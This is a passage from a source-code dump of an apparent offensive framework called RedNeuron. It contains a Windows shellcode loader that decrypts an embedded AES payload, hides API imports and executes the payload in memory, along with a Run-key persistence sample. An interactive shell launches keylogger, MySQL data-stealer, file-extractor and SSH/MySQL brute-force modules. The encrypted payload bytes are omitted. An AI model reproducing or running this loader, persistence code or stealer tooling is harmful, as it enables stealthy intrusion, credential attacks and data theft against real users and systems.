87 | for (i = 0; i < cProcesses; i++) { 88 | if (aProcesses[i] != 0) { 89 | PrintProcessNameAndID(aProcesses[i]); 90 | std::cout << std::endl; 91 | } 92 | } 93 | 94 | getch(); 95 | return 0; 96 | } 97 | -------------------------------------------------------------------------------- /code/proclist/procList.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/proclist/procList.exe -------------------------------------------------------------------------------- /code/proclist/proclist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | RED="\e[31m" 4 | GREEN="\e[32m" 5 | YELLOW="\e[33m" 6 | BLUE="\e[34m" 7 | ENDCOLOR="\e[0m" 8 | 9 | printf "\nPATH to save EXE = " 10 | read -r shellpath 11 | 12 | cp code/proclist/procList.exe $shellpath 13 | 14 | ls $shellpath/procList.exe >/dev/null 15 | e=$(echo $?) 

if [ "$e" -eq 0 ]; then
    echo -e "${GREEN}\n[+] EXE Created Successfully - $shellpath/procList.exe${ENDCOLOR}"
else
    echo -e "${RED}\n[-] Error Creating EXE${ENDCOLOR}\n"
    exit
fi

--------------------------------------------------------------------------------
/code/revshell.cpp:
--------------------------------------------------------------------------------
#include
#include
#include
#include
#include
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#include
#include "helpers.h"

typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef VOID (WINAPI * RtlMoveMemory_t)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length);


// Decrypts the payload buffer in place with CryptoAPI. The AES-256 key is not the
// key bytes themselves but is derived from their SHA-256 hash via CryptDeriveKey.
int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    HCRYPTKEY hKey;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
        return -1;
    }
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
        return -1;
    }
    if (!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){
        return -1;
    }
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
        return -1;
    }

    if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){
        return -1;
    }
    CryptReleaseContext(hProv, 0);
    CryptDestroyHash(hHash);
    CryptDestroyKey(hKey);
    return 0;
}

// Placeholder tokens for the encrypted payload and key; revshell2.cpp is the same
// file with concrete byte arrays in their place.
unsigned char payload[] = payloadaes
unsigned char key[] = KEYAES


int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    // VirtualAlloc and RtlMoveMemory are resolved at run time through the helpers in
    // helpers.h rather than appearing in the import table.
    VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "VirtualAlloc");
    RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "RtlMoveMemory");
    unsigned int payload_len = sizeof(payload);
    // Allocate a RW buffer, decrypt, copy the plaintext in, flip the page to RX and
    // run it on a new thread. This RW -> RX VirtualProtect on a fresh allocation
    // followed by CreateThread is the sequence memory-scanning defenses look for.
    exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key));
    pRtlMoveMemory(exec_mem, payload, payload_len);
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    if ( rv != 0 ) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);   // -1 is INFINITE
    }
    return 0;
}

--------------------------------------------------------------------------------
/code/revshell2.cpp:
--------------------------------------------------------------------------------
#include
#include
#include
#include
#include
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#include
#include "helpers.h"

typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef VOID (WINAPI * RtlMoveMemory_t)(VOID UNALIGNED *Destination, const VOID UNALIGNED *Source, SIZE_T Length);


// Identical to the AESDecrypt in revshell.cpp: SHA-256 of the key bytes is fed to
// CryptDeriveKey and the payload is decrypted in place.
int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
    HCRYPTPROV hProv;
    HCRYPTHASH hHash;
    HCRYPTKEY hKey;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
        return -1;
    }
    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
        return -1;
    }
    if (!CryptHashData(hHash, (BYTE*) key, (DWORD) keylen, 0)){
        return -1;
    }
    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
        return -1;
    }

    if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, (BYTE *) payload, (DWORD *) &payload_len)){
        return -1;
    }
    CryptReleaseContext(hProv, 0);
    CryptDestroyHash(hHash);
    CryptDestroyKey(hKey);
    return 0;
}

// Concrete build of the revshell.cpp template: the AES-encrypted payload (several
// hundred bytes) and the 16-byte key. The raw byte arrays are omitted here.
unsigned char payload[] = { /* encrypted payload bytes omitted */ };
unsigned char key[] = { /* 16-byte key omitted */ };


int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    // Same loader sequence as revshell.cpp: resolve APIs at run time, allocate RW,
    // decrypt, copy, change the page to RX, execute on a new thread.
    VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "VirtualAlloc");
    RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t) hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), "RtlMoveMemory");
    unsigned int payload_len = sizeof(payload);
    exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    AESDecrypt((char *) payload, payload_len, (char *) key, sizeof(key));
    pRtlMoveMemory(exec_mem, payload, payload_len);
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    if ( rv != 0 ) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);   // -1 is INFINITE
    }
    return 0;
}

--------------------------------------------------------------------------------
/code/runkeys.cpp:
--------------------------------------------------------------------------------
#include

#include
#include
#include

char* tita;
const char* exe;
const char* exe2;

using namespace std;

// Non-standard main signature (hence -Wmain in the build line below); the
// parameter is overwritten immediately.
int main(const char* exe) {
    exe = "calc.exe";
    HKEY hkey = NULL;

    // Persistence sample: write a REG_SZ value named "salsa" under the current
    // user's Run key so the program path runs at every logon (calc.exe as stand-in).
    // Defenders can audit this key directly; persistence/check.sh in this repo does so.
    LONG res = RegOpenKeyEx(HKEY_CURRENT_USER,(LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        RegSetValueEx(hkey,(LPCSTR)"salsa", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
        RegCloseKey(hkey);
    }
    // The mingw cross-compile command for this file, invoked through system() here
    // instead of from a build script.
    system("x86_64-w64-mingw32-g++ runkeys.cpp -I/usr/share/mingw-w64/include/ -o runkeys.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -Wmain");
}





--------------------------------------------------------------------------------
/code/shell.h:
--------------------------------------------------------------------------------
#include
#include
#include "create.h"

using namespace std;

string op;
int cont;

void createshell(){
    string op;   // shadows the global op for this sub-shell
    cont = 0;
    createmenu();
    while (op != "exit" && op != "Exit" && op != "EXIT" )
    {
        if (cont != 0) {
            cout<<"\nRedNeuron@create-> ";
        }
        getline(cin, op);
        if (op == "list" || op == "List" || op == "LIST"){
            listcreate();
        }
        else if(op == "a"){
            //hahah
        }
        else if (op == "help" || op == "Help" || op == "HELP"){
            createmenu();
        }
        else if (op == "reverse shell"){
            createrevshell();
        }
        else if (op == "revshell" || op == "Revshell" || op == "REVSHELL"){
            createrevshell();
        }
        else if (op == "clear" || op == "Clear" || op == "CLEAR"){
            system("clear");
        }
        else if (op == "commands" || op == "Commands" || op == "COMMANDS"){
            createcommands();
        }
        else if (op == "main" || op == "Main" || op == "MAIN"){
            //soon...
        }
        else if (op == "persistence" || op == "Persistence" || op == "PERSISTENCE"){
            createpersistence();
        }
        else if (op == "proclist" || op == "Proclist" || op == "PROCLIST"){
            createproclist();
        }
        else if(op == "windowinjector" || op == "Windowinjector" || op == "WINDOWINJECTOR"){
            createWindowInjector();
        }
        else{
            if (cont != 0){
                red("\n[-] Command not found\n");
            }
        }
        cont++;
    }
}

static int postexploitationshell(){
    op = "a";
    while (op != "exit" && op != "Exit" && op != "EXIT"){
        cout<<"\nRedNeuron@postexploitation-> ";
        cin>>op;
        if (op == "help" || op == "Help" || op == "HELP"){
            postexploitationmenu();
        }
        else if (op == "clear" || op == "Clear" || op == "CLEAR"){
            system("clear");
        }
        else if (op == "list" || op == "List" || op == "LIST"){
            // postexploitationlist();
        }
        else if (op == "commands" || op == "Commands" || op == "COMMANDS"){
            // postexploitationlist();
        }
        else if (op == "file-extractor" || op == "File-extractor" || op == "FILE-EXTRACTOR"){
            system("./code/postexploitation/file-extractor/file-extractor.sh");
        }
        else if (op == "mysql-stealer" || op == "Mysql-stealer" || op=="MYSQL-STEALER"){
            system("./code/postexploitation/MySQL-dataStealer/MySQL_DataStealer.sh");
        }
        else if (op == "keylogger" || op == "Keylogger" || op == "KEYLOGGER"){
            system("./code/postexploitation/keylogger/keylogger.sh");
        }
        else if (op == "main" || op == "Main" || op == "MAIN"){
            //soon...
        }
        else{
            red("\n[-] Command not found\n");
        }
    }
    return 0;
}

static int bruteforceshell(){
    op = "a";
    while (op != "exit" && op != "Exit" && op != "EXIT"){
        cout<<"\nRedNeuron@bruteforce-> ";
        cin>>op;
        if (op == "ssh" || op == "Ssh" || op == "SSH"){
            system("./code/bruteforce/ssh/bruteSSH");
        }
        else if(op == "help" || op == "Help" || op == "HELP" || op == "commands" || op == "Commands" || op == "COMMANDS"){
            bruteforcemenu();
        }
        else if(op == "mysql" || op == "Mysql" || op == "MYSQL"){
            system("./code/bruteforce/mysql/bruteMySQL");
        }
        else if (op == "list" || op == "List" || op == "LIST"){
            bruteforcelist();
        }
        else if (op == "clear" || op == "Clear" || op == "CLEAR"){
            system("clear");
        }
    }
    return 0;
}

static int mainshell(){
    op = "a";
    while (op != "exit" && op != "Exit" && op != "EXIT" ){
        cout<<"\nRedNeuron@main-> ";
        // cin >> op reads a single whitespace-delimited word, so the multi-word
        // commands below ("create help", "create list", ...) can never match here.
        cin>>op;
        if (op == "create" || op == "Create" || op == "CREATE"){
            createshell();
        }
        else if (op == "create help" || op == "Create Help" || op == "CREATE HELP"){
            //createmenu();
        }
        else if (op == "create list" || op == "Create List" || op == "CREATE LIST"){
            listcreate();
        }
        else if (op == "create revshell" || op == "Create Revshell" || op == "CREATE REVSHELL"){
            createrevshell();
        }
        else if (op == "clear" || op == "Clear" || op == "CLEAR"){
            system("clear");
        }
        else if (op == "help" || op == "Help" || op == "HELP"){
            helpmenu();
        }
        else if (op == "list" || op == "List" || op == "LIST"){
            commandsmenu();
        }
        else if (op == "commands" || op == "Commands" || op == "COMMANDS"){
            commandsmenu();
        }
        else if (op == "bruteforce" || op == "Bruteforce" || op == "BRUTEFORCE"){
            bruteforcemenu();
            bruteforceshell();
        }
        else if (op == "create reverse shell" || op == "Create Reverse Shell" || op == "CREATE REVERSE SHELL"){
            createrevshell();
        }
        else if (op == "postexploitation" || op == "Postexploitation" || op == "POSTEXPLOITATION"){
            postexploitationmenu();
            postexploitationshell();
        }
        else{
            red("\n[-] Command not found\n");
        }
    }
    green("\nBye Bye :)");

    return 0;
}
--------------------------------------------------------------------------------
/code/shellcode.c:
--------------------------------------------------------------------------------
// Raw x64 shellcode as a C string literal. The byte string itself (33 lines of
// "\x.." escapes) is omitted here.
unsigned char buf[] =
    "";
--------------------------------------------------------------------------------
/code/temp.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/code/temp.raw
--------------------------------------------------------------------------------
/code/windowname.txt:
--------------------------------------------------------------------------------
Untitled - Notepad
--------------------------------------------------------------------------------
/redneuron.cpp:
--------------------------------------------------------------------------------
#include
#include "code/menus.h"
#include "code/shell.h"

using namespace std;

int main() {
    checkdependeces();
    system("bash code/banner.sh");
    mainmenu();
    cout<<"\n\n";
    helpmenu();
    mainshell();
    return 0;
}

--------------------------------------------------------------------------------
/redneuron.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S12cybersecurity/RedNeuron/b7924af2d5e15d408d297295451387c6b866d916/redneuron.zip
--------------------------------------------------------------------------------